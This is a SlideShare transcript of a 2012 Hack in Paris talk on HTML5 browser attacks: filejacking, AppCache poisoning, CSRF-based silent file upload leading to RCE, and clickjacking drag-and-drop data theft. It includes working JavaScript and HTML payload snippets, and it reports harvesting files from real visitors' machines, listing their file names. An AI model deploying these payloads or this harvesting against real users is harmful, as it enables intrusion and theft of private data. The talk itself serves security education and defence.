Html5: Something wicked this way comes (Hack in Paris)
Upcoming SlideShare
Loading in...5

Html5: Something wicked this way comes (Hack in Paris)



The talk given in Hack In Paris 2012 conference

The talk given in Hack In Paris 2012 conference



Total Views
Views on SlideShare
Embed Views



29 Embeds 12,307 11685 307 166 29 26 24 19 10 8 4 3 3 2 2 2
http://localhost 2 2 2 1 1 1 1 1 1 HTTP 1 1 1 1 1



Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

Html5: Something wicked this way comes (Hack in Paris) Html5: Something wicked this way comes (Hack in Paris) Presentation Transcript

  • H TML5 Krzysztof Kotowicz, SecuRing @kkotowicz
  • Meet Bob 2
  • Meet Bob #1 Bob is a CSO of #1b Bob has interesting stuff #2 I don’t like Bob #3 I want to pwn Bob 3 View slide
  • Bob’s pwnage stage #1• Bob has a hobby - e.g. hacking• He has cool file://s• I want to get them!• He’s not THAT stupid to run EXE, SCR etc.• Use filejacking! 4 View slide
  • Filejacking• HTML5 directory upload (Chrome only) <input type=file directory>• displays this ====>• JS gets read access to all files within chosen folder 5
  • Filejacking Business plan• set up tempting webpage• overlay input (CSS) with• wait for Bob• get files & upload them to your server 6
  • Filejacking 7
  • Filejacking 8
  • Filejacking• I’ve tried this IRL• How clueless users actually are? • running for ~13 mo • very limited exposure • only websec oriented visitors• 298 clients connected (217 IPs)• tons of interesting files 9
  • Filejacking LOTS of these ------>• Downloads/#• Downloads/#• BratSluts 11 12 04 Sasha Cane Red Tartan SchoolGirl XXX 720p WMV SEXORS.nzb• bitches/1300563524557.jpg• Flowchart-Fap-To-It.jpg 10
  • Filejacking• websec staff!• but surely no private data? 11
  • Filejacking• Wireless Assess points.txt• interesting network next to me.txt• onlinePasswords.txt• s/pw.txt• letter of authorization.pdf• Staff-<name,surname>.pdf• <name,surname> - resume.doc•• but surely no clients data? 12
  • Filejacking• sony reports/ • Faktura_numer_26_2011_ <company>.pdf• SecurityQA.SQL.Injection. • websec cred~ Results.v1.1.docx •• SSOCrawlTest5.4.097.xml • !important - questions for• IPS CDE Wireless Audit- web developers.docx January 2011-1 0.docx • sslstrip.log~• IPS Wireless Testing • ##### Paros Log.txt Schedule April 2011.xls• 01-####### Corporation (Security Unarmed So much for NDAs... Guard).xls 13
  • Filejacking+ All your file are belong to me+ Trivial to set up+ Filter files by e.g. extension, size etc.- Chrome only- Requires users prone to social- engineering 14
  • Bob’s pwnage stage #2• Bob travels a lot & loves Facebook• I want to control Bob’s FB account • even when he changes the password in a month• I want to fingerprint Bob’s intranet• Use rogue access point & AppCache poisoning! 15
  • AppCache poisoning HTML5 Offline Web Applications <html manifest=cache.manifest>• cache.manifest lists URLs to cache• cache expires only when CACHE MANIFEST index.html manifest is changed stylesheet.css images/logo.png scripts/main.js 16
  • AppCache poisoning Poison Wait Profit AppCache for Bob 17
  • AppCache poisoning• DEMO• Quirks used: • manifest must be MIME text/cache-manifest • Chrome fills AppCache without user confirmation 18
  • AppCache poisoning• tamper http://victim/ <html manifest=/robots.txt> <script>evil()</script>• tamper http://victim/robots.txt CACHE MANIFEST CACHE: http://victim/ NETWORK: * 19
  • AppCache poisoning Later on, after m-i-t-m:1. http://victim/ fetched from AppCache2. browser checks for new manifest GET /robots.txt3. receives text/plain robots.txt & ignores it4. tainted AppCache is still used 20
  • AppCache poisoning+ Poison any URL+ Payload stays until manually removed- Chrome or Firefox with user interaction- Needs active man-in-the-middle to inject 21
  • Bob’s pwnage stage #3• Bob loves sharing photos (Flickr?)• I want to replace Bob as CSO• What if Bob uploaded some discrediting files?• Try silent file upload 22
  • Silent file upload• File upload purely in Javascript• Emulates <input type=file> with: • any file name • any file content• File constructed in Javascript (it’s not a real file!)• Uses Cross Origin Resource Sharing 23
  • Silent file upload• Cross Origin Resource Sharing = cross domain AJAX xhr = new XMLHttpRequest();"POST", "http://victim", true);xhr.setRequestHeader("Content-Type", "text/plain");xhr.withCredentials = "true"; // send cookiesxhr.send("Anything I want"); 24
  • Silent file upload• raw multipart/form-data requestfunction fileUpload(url, fileData, fileName) {   var boundary = "xxxxxxxxx",     xhr = new XMLHttpRequest();"POST", url, true);   xhr.withCredentials = "true";   xhr.setRequestHeader("Content-Type", "multipart/form-data,boundary="+boundary); 25
  • Silent file uploadvar b = "--" + boundary + rnContent-Disposition: form-data; name="contents"; filename=" + fileName + "rnContent-Type: application/octet-streamrnrn + fileData + rn-- + boundary + --;xhr.setRequestHeader("Content-Length", b.length);xhr.send(b); 26
  • Silent file upload+ No user interaction+ Works in most browsers+ You can add more form fields- CSRF flaw needed- No access to response 27
  • Silent file upload DEMO 28
  • Silent file upload• GlassFish Enterprise Server 3.1. • CVE 2012-0550 by Roberto Suggi Liverani• // logUrl = http://glassfishserver/ management/domain/applications/ application; fileUpload(c,"maliciousarchive.war");• logged admin + CSRF = RCE 29
  • Same origin policy• makes web (relatively) safe • restricts cross-origin communication• can be relaxed though • crossdomain.xml • document.domain • HTML5 Cross Origin Resource Sharing• or ignored... • UI redressing 30
  • UI Redressing? Jedi mind tricks on victim users 31
  • UI Redressing • This is not the page you’re looking at • This is not the thing you’re clicking • .................................................. dragging • .................................................. typing • .................................................. copying • Victims attack the applications for us 32
  • Clickjacking? 33
  • Bob’s pwnage stage #4• Bob likes online games• I found a vulnerable website used by Bob• Bob would have to type the payload himself :-(• Make Bob play a game! 34
  • Drag into• Put attackers content into victim form Demo 35
  • Drag into+ Inject arbitrary content+ Trigger self-XSS- Firefox only (will die soon!)- X-Frame-Options 36
  • Bob’s pwnage stage #5• Bob has access to internal HR application• I want to know his salary• Make Bob play a game (again)! 37
  • Drag out content extraction image image 38
  • Drag out content extraction image victim <iframe> image 39
  • Drag out content extraction image victim <iframe> textarea <textarea> 40
  • Drag out content extraction<div id=game style="position:relative">   <img style="position:absolute;..." src="paper.png" />  <img style="position:absolute;..." src="trash.png" />      <iframe scrolling=no id=iframe style="position:absolute;opacity:0;..."> </iframe>   <textarea style="position:absolute; opacity:0;..." id=dropper></textarea></div> 41
  • Drag out content extraction 42
  • Drag out content extraction 43
  • Drag out content extraction Demo . 44
  • Drag out content extraction+ Access sensitive content cross domain- Firefox only (will die soon!)- X-Frame-Options 45
  • Summary• HTML5 is attacker’s friend too!• Don’t get framed• Users based pwnage FTW Developers: Use X-Frame-Options: DENY 46
  • Wake up, I’m done!••••• Twitter: @kkotowicz Thanks @0x6D6172696F, @garethheyes, @theKos, @7a_, @lavakumark, @malerisch, @skeptic_fx, .... 47